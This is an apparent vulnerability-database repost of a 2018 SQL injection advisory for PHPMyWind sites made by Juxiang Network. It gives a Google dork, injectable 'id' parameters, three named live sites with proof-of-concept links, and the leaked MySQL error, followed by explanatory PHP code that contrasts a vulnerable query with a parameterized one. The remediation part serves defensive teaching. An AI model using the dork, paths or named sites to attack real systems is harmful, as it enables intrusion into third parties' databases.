China Hangzhou City Technical Technology Support Juxiang Network 技术支持:聚翔网络 SQL Injection

Vulnerability ID 1034915 Vulnerability type
Published 2018-05-31 Updated 2018-05-31
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2018050311
|Vulnerability details
Vulnerability details have not been disclosed yet
|Exploit
#################################################################################################

# Exploit Title :  China Hangzhou City Technical Technology Support Juxiang Network 技术支持:聚翔网络 SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 30/05/2018
# Vendor Homepages/Owners : dedaogame.com / radiantviewer.com / feesee.com / d58.net / linkedin.com/in/juxiang-jin-77131546 / shop1369760423327.1688.com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork :  intext:''技术支持:聚翔网络''

In English this means ''Technical Support Juxiang Network''

# Exploit : /?id=[SQL Injection]

# Exploit : /en/list.php?id=[SQL Injection]

# Exploit : /en/img_anis.php?id=[SQL Injection]

# Exploit : /en/message.php?id=[SQL Injection]

# Exploit : /en/aboutus.php?id=[SQL Injection]

# Exploit : /contents.php?id=2&cid=[SQL Injection]

# Exploit : /message.php?id=[SQL Injection]

#################################################################################################

# Example Site =>  hzjkang.com/en/aboutus.php?id=1%27 => [ Proof of Concept for SQL Injection ] => archive.is/67pRx

# Example Site =>  atk-china.com/aboutus.php?id=1%27 => [ Proof of Concept for SQL Injection ] => archive.is/YtoHD

# Example Site =>  hszxrz.com/aboutus.php?id=1%27 => [ Proof of Concept for SQL Injection ] => archive.is/3GHK6

# Example SQL/DB error that appears on the page :

PHPMyWind安全警告:MySql Error!
错误文件:/aboutus.php
错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 Error sql: SELECT * FROM `hzjx_infoclass` where id=1\'

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
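
The error text above shows the `id` value reaching the query as `id=1\'`: the quote was escaped, but the value sits in an unquoted numeric position, where quote escaping offers no protection, and the full SQL is echoed to the client. The sketch below is an added example, not code from the advisory or from PHPMyWind; it contrasts that assumed pattern with a validated, parameterized lookup. The function names, the `classname` column, the use of `addslashes()` and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
// Constructed stand-in for the table named in the error message. In-memory SQLite
// is used only so this runs offline; the affected sites use MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE hzjx_infoclass (id INTEGER PRIMARY KEY, classname TEXT)');
$pdo->exec("INSERT INTO hzjx_infoclass VALUES (1, 'About us'), (2, 'Contact')");

// Assumed vulnerable pattern: the value is quote-escaped, then concatenated into an
// unquoted numeric context, so the escaping does not constrain it to a number.
function lookupVulnerable(PDO $pdo, string $id): string
{
    $sql = 'SELECT * FROM hzjx_infoclass where id=' . addslashes($id);
    try {
        $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
        return $row ? $row['classname'] : 'not found';
    } catch (PDOException $e) {
        // Mirrors the page's behaviour: driver message and SQL text sent to the client.
        return 'DB error: ' . $e->getMessage() . ' Error sql: ' . $sql;
    }
}

// Hardened: strict integer validation, bound parameter, generic client-facing error.
function lookupHardened(PDO $pdo, string $id): string
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return 'bad request'; // rejected before any SQL is built
    }
    try {
        $stmt = $pdo->prepare('SELECT classname FROM hzjx_infoclass WHERE id = :id');
        $stmt->bindValue(':id', $n, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row ? $row['classname'] : 'not found';
    } catch (PDOException $e) {
        error_log('infoclass lookup failed: ' . $e->getMessage()); // detail stays server-side
        return 'internal error';
    }
}

// "1'" is the input shown on the page (id=1%27); '1' and '99' are constructed.
foreach (['1', "1'", '99'] as $id) {
    printf("%-4s vulnerable: %s\n     hardened:   %s\n", $id,
        lookupVulnerable($pdo, $id), lookupHardened($pdo, $id));
}
```

For the `1'` input the first function returns the driver error together with the SQL text, as on the affected pages, while the second returns `bad request` without touching the database.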